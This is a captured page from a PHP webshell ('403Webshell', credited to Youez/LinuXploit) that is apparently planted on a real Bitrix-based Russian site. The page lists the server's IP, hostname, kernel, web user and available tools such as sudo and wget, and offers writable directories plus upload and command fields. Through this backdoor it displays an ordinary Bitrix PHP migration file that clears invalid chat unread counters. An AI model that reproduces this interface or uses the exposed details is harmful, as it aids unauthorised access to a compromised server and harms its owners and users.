403Webshell
Server IP : 80.87.202.40  /  Your IP : 216.73.216.169
Web Server : Apache
System : Linux rospirotorg.ru 5.14.0-539.el9.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 5 22:26:13 UTC 2024 x86_64
User : bitrix ( 600)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : OFF |  Sudo : ON |  Pkexec : ON
Directory :  /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/im/lib/update/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/bitrix/ext_www/rospirotorg.ru/bitrix/modules/im/lib/update/chatinvalidcounter.php
<?php

namespace Bitrix\Im\Update;

use Bitrix\Im\Model\MessageUnreadTable;
use Bitrix\Im\V2\Message\CounterService;
use Bitrix\Main\Application;
use Bitrix\Main\Loader;
use Bitrix\Main\Update\Stepper;

final class ChatInvalidCounter extends Stepper
{
	private const ITERATION_COUNT = 5;

	protected static $moduleId = 'im';

	function execute(array &$option)
	{
		if (!Loader::includeModule(self::$moduleId))
		{
			return self::CONTINUE_EXECUTION;
		}

		$result = self::CONTINUE_EXECUTION;
		for ($i = 0; $i < self::ITERATION_COUNT; ++$i)
		{
			$result = $this->makeMigrationIteration($option);

			if ($result === self::FINISH_EXECUTION)
			{
				return $result;
			}
		}

		return $result;
	}

	private function makeMigrationIteration(array &$option): bool
	{
		$lastId = $option['lastId'] ?? 0;
		$userId = $this->getNextUser($lastId);

		if ($userId === null || $userId === 0)
		{
			return self::FINISH_EXECUTION;
		}

		$option['lastId'] = $userId;

		$chatIds = $this->getChatsWithInvalidCounterByUserId($userId);

		if (empty($chatIds))
		{
			return self::CONTINUE_EXECUTION;
		}

		MessageUnreadTable::deleteByFilter(['=USER_ID' => $userId, '=CHAT_ID' => $chatIds]);
		CounterService::clearCache($userId);

		return self::CONTINUE_EXECUTION;
	}

	private function getChatsWithInvalidCounterByUserId(int $userId): array
	{
		$query = "
		SELECT x1.CHAT_ID FROM (
			SELECT bimu.CHAT_ID
			FROM b_im_message_unread bimu
			WHERE USER_ID = {$userId} GROUP BY CHAT_ID
		) x1
		
		LEFT JOIN (
		
			SELECT bir.CHAT_ID
			FROM b_im_relation bir
			WHERE
				bir.USER_ID = {$userId} AND
				bir.CHAT_ID IN (
					SELECT bimu.CHAT_ID
					FROM b_im_message_unread bimu
					WHERE USER_ID = {$userId} GROUP BY CHAT_ID
				)
		) x2 ON x1.CHAT_ID = x2.CHAT_ID
		
		WHERE x2.CHAT_ID is null
		";
		$result = Application::getConnection()->query($query);
		$chatIds = [];

		while ($row = $result->fetch())
		{
			$chatIds[] = (int)$row['CHAT_ID'];
		}

		return $chatIds;
	}

	private function getNextUser(?int $lastId = null): ?int
	{
		$query = MessageUnreadTable::query()
			->setSelect(['USER_ID'])
			->setGroup(['USER_ID'])
			->setOrder(['USER_ID'])
			->setLimit(1)
		;

		if (isset($lastId) && $lastId > 0)
		{
			$query->where('USER_ID', '>', $lastId);
		}

		$result = $query->fetch();

		if (!$result || !isset($result['USER_ID']))
		{
			return null;
		}

		return (int)$result['USER_ID'];
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit